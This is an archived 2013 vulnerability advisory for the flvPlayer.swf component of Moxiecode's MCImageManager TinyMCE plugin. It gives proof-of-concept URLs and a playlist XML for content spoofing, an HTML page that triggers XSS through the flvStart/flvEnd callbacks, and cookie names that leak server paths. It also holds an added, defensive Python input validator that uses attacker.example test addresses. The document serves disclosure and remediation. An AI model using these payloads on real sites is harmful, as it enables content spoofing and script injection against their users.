CS, XSS and FPD vulnerabilities in MCImageManager for TinyMCE

SECURITYVULNS:DOC:29740
Sep 09, 2013 (archived at vulners.com)

Hello 3APA3A!

I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is a commercial plugin for TinyMCE. It affects both MCImageManager itself and all web applications that ship MCImageManager in their bundle.

These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure vulnerabilities. I informed the developer about the Content Spoofing and Cross-Site Scripting vulnerabilities in flvPlayer already in October 2011 (it was part of the Media plugin for TinyMCE) and disclosed them in November. After my notification he fixed these holes in the Media plugin in November 2011, but he forgot to fix them in the MCImageManager plugin.


Affected products:

Moxiecode Image Manager 3.1.5 and earlier versions are vulnerable.


Affected vendors:

Moxiecode
http://www.moxiecode.com


Details:

Content Spoofing (WASC-12):

The Flash file flvPlayer.swf accepts arbitrary addresses in the parameters flvToPlay and startImage, which allows spoofing the content of the player, e.g. by setting the addresses of video and/or image files hosted on another site.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg

The Flash file flvPlayer.swf also accepts arbitrary addresses in the parameter flvToPlay when it points at a playlist, which allows spoofing the content of the player by setting the address of a playlist file from another site (the thumbnail and url attributes in the XML file accept arbitrary addresses as well).

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
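The two content-spoofing cases above (off-site addresses in flvToPlay/startImage, and off-site thumbnail/url attributes inside a playlist) share one root cause: the player never checks where a supplied address points. The following is an added example, not code from Moxiecode or the plugin, of the server-side input validation that closes both: FlashVars and playlist entries are accepted only as relative, traversal-free paths with an expected media extension. Hostnames and file names in the sample data are constructed.

```python
# Added example (not the plugin's own code): validate the flvPlayer.swf inputs
# named in the advisory so they can only reference same-site media files.
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET

# Expected file types per FlashVar (assumption: the player needs nothing else).
URL_PARAMS = {"flvToPlay": (".flv", ".xml"),
              "startImage": (".jpg", ".jpeg", ".png", ".gif")}
BOOL_PARAMS = ("autoStart", "jsCallback")

def is_local_media(value, allowed_exts):
    """Accept only a relative, traversal-free path with an expected extension."""
    parts = urlsplit(value.strip())
    if parts.scheme or parts.netloc:        # http://, //host, javascript:, data:, ...
        return False
    path = parts.path
    if "\\" in path or ".." in path.split("/"):
        return False
    return path.lower().endswith(tuple(allowed_exts))

def validate_flashvars(params):
    """Return only the FlashVars that pass validation; off-site values are dropped."""
    clean = {}
    for name, value in params.items():
        if name in URL_PARAMS and is_local_media(value, URL_PARAMS[name]):
            clean[name] = value.strip()
        elif name in BOOL_PARAMS and value in ("true", "false"):
            clean[name] = value
    return clean

def playlist_problems(xml_text):
    """List (item index, attribute, value) for playlist entries that point off-site."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [(-1, "xml", str(exc))]
    problems = []
    for idx, item in enumerate(root.iter("item")):
        for attr, exts in (("thumbnail", URL_PARAMS["startImage"]), ("url", (".flv",))):
            value = item.get(attr, "")
            if not is_local_media(value, exts):
                problems.append((idx, attr, value))
    return problems

# Constructed sample: one local item and one whose files live on another host.
SAMPLE_PLAYLIST = """<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="ok" thumbnail="1.jpg" url="1.flv"/>
<item name="spoofed" thumbnail="//attacker.example/2.jpg" url="http://attacker.example/2.flv"/>
</playlist>"""

if __name__ == "__main__":
    print(validate_flashvars({"flvToPlay": "http://attacker.example/1.flv",
                              "startImage": "1.jpg", "autoStart": "false"}))
    print(playlist_problems(SAMPLE_PLAYLIST))
```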

XSS (WASC-08):

If a page on the site that embeds flvPlayer.swf (with the parameter jsCallback=true, or where this parameter can be set for flv_player.swf) allows injecting JS code that defines the functions flvStart() and/or flvEnd() (via HTML Injection), then an XSS attack is possible. I.e. the JS callbacks can be used for an XSS attack.

Example of exploit:

<html>
<body>
<script>
function flvStart() {
  alert('XSS');
}
function flvEnd() {
  alert('XSS');
}
</script>
<object width="50%" height="50%">
  <param name="movie" value="flvPlayer.swf">
  <param name="quality" value="high">
  <embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Full Path Disclosure (WASC-13):

The full filesystem path is disclosed in the cookies MCManager_im_lastPath and MCManagerHistoryCookie_im.


Timeline:

2011.10.20 - informed the developer of flvPlayer.
2011.10.20 - informed the developer of TinyMCE (which was bundled with flvPlayer in the Media plugin).
2013.06.11 - announced at my site.
2013.06.13 - informed the developer of MCImageManager.
2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua